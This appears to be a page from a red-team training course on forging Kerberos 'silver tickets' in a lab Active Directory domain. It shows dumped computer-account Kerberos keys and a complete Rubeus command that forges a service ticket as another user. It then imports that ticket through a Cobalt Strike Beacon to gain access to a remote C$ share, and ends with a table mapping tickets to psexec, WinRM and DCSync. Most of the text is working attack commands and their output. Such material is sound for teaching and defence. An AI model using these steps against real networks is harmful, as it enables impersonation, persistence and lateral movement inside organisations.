Silver Tickets

A "silver ticket" is a forged TGS, signed using the secret material (RC4/AES keys) of a computer account. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence. By default, computer passwords change every 30 days, at which time you must re-obtain the new secrets to continue making silver tickets. Both silver and golden (coming up next) tickets are forged, so can be generated on your own machine and imported into your Beacon session for use.

Let's say we dumped Kerberos keys from Workstation 1 from a SYSTEM Beacon.

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WKSTN-1$
Domain            : DEV
Logon Server      : (null)
Logon Time        : 9/9/2022 9:37:22 AM
SID               : S-1-5-20

	 * Username : wkstn-1$
	 * Domain   : DEV.CYBERBOTIC.IO
	 * Password : (null)
	 * Key List :
	   aes256_hmac       c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7
	   rc4_hmac_nt       fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old      fc0c8a61a83bafdffc587956d0020398
	   rc4_md4           fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_nt_exp   fc0c8a61a83bafdffc587956d0020398
	   rc4_hmac_old_exp  fc0c8a61a83bafdffc587956d0020398

\

On your Windows attacking machine, use Rubeus to forge a TGS for nlamb and the cifs service.

PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

[*] Action: Build TGS

[*] Building PAC

[*] Domain         : DEV.CYBERBOTIC.IO (DEV)
[*] SID            : S-1-5-21-569305411-121244042-2357301523
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : C9E598CD2A9B08FE31936F2C1846A8365D85147F75B8000CBC90E3C9DE50FCC7
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : cifs
[*] Target         : wkstn-1.dev.cyberbotic.io

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'nlamb' to 'cifs/wkstn-1.dev.cyberbotic.io'

[*] AuthTime       : 9/9/2022 10:49:41 AM
[*] StartTime      : 9/9/2022 10:49:41 AM
[*] EndTime        : 9/9/2022 8:49:41 PM
[*] RenewTill      : 9/16/2022 10:49:41 AM

[*] base64(ticket.kirbi):

      doIFXD[...]MuaW8=

\

Then import the ticket.

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[-] could not open \\wkstn-1.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=

[*] Using DEV\nlamb:FakePass

[*] Showing process : False
[*] Username        : nlamb
[*] Domain          : DEV
[*] Password        : FakePass
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5668
[+] Ticket successfully imported!
[+] LUID            : 0x423091

beacon> steal_token 5668

beacon> ls \\wkstn-1.dev.cyberbotic.io\c$
[*] Listing: \\wkstn-1.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 08:17:30   $Recycle.Bin
          dir     08/15/2022 22:22:31   $WinREAgent
          dir     01/27/2022 18:18:49   Documents and Settings
          dir     12/07/2019 09:14:52   PerfLogs
          dir     08/22/2022 00:15:03   Program Files
          dir     10/06/2021 13:57:25   Program Files (x86)
          dir     09/08/2022 13:58:46   ProgramData
          dir     08/17/2022 17:52:54   Recovery
          dir     09/06/2022 08:17:28   System Volume Information
          dir     08/16/2022 08:15:58   Users
          dir     09/09/2022 10:38:50   Windows
 8kb      fil     09/09/2022 08:37:00   DumpStack.log.tmp
 796mb    fil     09/09/2022 08:37:00   hiberfil.sys
 704mb    fil     09/09/2022 08:37:00   pagefile.sys
 16mb     fil     09/09/2022 08:37:00   swapfile.sys

\

Here are some useful ticket combinations:

Technique

Required Service Tickets

psexec

CIFS

winrm

HOST & HTTP

dcsync (DCs only)

LDAP

PreviousDomain DominanceNextGolden Tickets

Last updated